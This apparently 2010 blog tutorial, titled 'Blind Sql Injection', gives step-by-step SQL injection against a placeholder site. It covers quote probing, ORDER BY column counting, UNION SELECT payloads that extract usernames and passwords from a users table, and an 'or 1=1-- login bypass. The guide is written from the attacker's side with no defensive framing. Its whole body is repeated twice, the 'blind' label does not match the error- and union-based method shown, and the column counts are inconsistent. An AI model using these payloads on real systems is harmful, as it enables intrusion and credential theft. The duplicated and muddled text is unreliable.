0
Blind Sql Injection
04 August 2010
Sql injection is a way to get information from a database, login as an authenticated user, or even delete records in a database. Sql injection can be performed on Sql and MySql servers. Many times to find the vulnerable server an attacker will perform simple injections, then escalate to more complex ones. Lets start with an example url and sql injection.
Example:
http://injectable-site.com?page=1
We start by adding a simple single quote at the end like so:
http://injectable-site.com?page=1'
or
http://injectable-site.com?page=1 '1=1--
What we are looking for is an error code stating that we have an error in our sql. Now lets move on and find the number of columns in the table.
http://injectable-site.com?page=1 order by 1--
http://injectable-site.com?page=1 order by 2--
http://injectable-site.com?page=1 order by 3--
and so on, until the page says "the page cannot be displayed", or "unknown column". This tells us that the number we entered before the page stated this would be our number of columns. Now lets try Unions to see if the command works. You would enter the text as follows:
http://injectable-site.com?page=1 union all select 1,2,3--
Bingo, the numbers printed to the screen unions work. Now lets check for column names:
http://injectable-site.com?page=1 union all select 1,2,3 from users--
If the number is still on the screen the column exists in the table, if not, keep guessing.
Now lets see if there is a username and password column
http://injectable-site.com?page=1 union all select 1,2,username,3 from users--
http://injectable-site.com?page=1 union all select 1,2,password,3 from users--
These are pretty basic examples, and the injections can get a lot more complex. There are many tutorials online that go into further detail about dropping tables, adding users, and many other things.
Sometimes injections are a simple 'or 1=1-- into a login form and we get admin or root, a lot of the time we have to work for it.
Example:
http://injectable-site.com?page=1
We start by adding a simple single quote at the end like so:
http://injectable-site.com?page=1'
or
http://injectable-site.com?page=1 '1=1--
What we are looking for is an error code stating that we have an error in our sql. Now lets move on and find the number of columns in the table.
http://injectable-site.com?page=1 order by 1--
http://injectable-site.com?page=1 order by 2--
http://injectable-site.com?page=1 order by 3--
and so on, until the page says "the page cannot be displayed", or "unknown column". This tells us that the number we entered before the page stated this would be our number of columns. Now lets try Unions to see if the command works. You would enter the text as follows:
http://injectable-site.com?page=1 union all select 1,2,3--
Bingo, the numbers printed to the screen unions work. Now lets check for column names:
http://injectable-site.com?page=1 union all select 1,2,3 from users--
If the number is still on the screen the column exists in the table, if not, keep guessing.
Now lets see if there is a username and password column
http://injectable-site.com?page=1 union all select 1,2,username,3 from users--
http://injectable-site.com?page=1 union all select 1,2,password,3 from users--
These are pretty basic examples, and the injections can get a lot more complex. There are many tutorials online that go into further detail about dropping tables, adding users, and many other things.
Sometimes injections are a simple 'or 1=1-- into a login form and we get admin or root, a lot of the time we have to work for it.
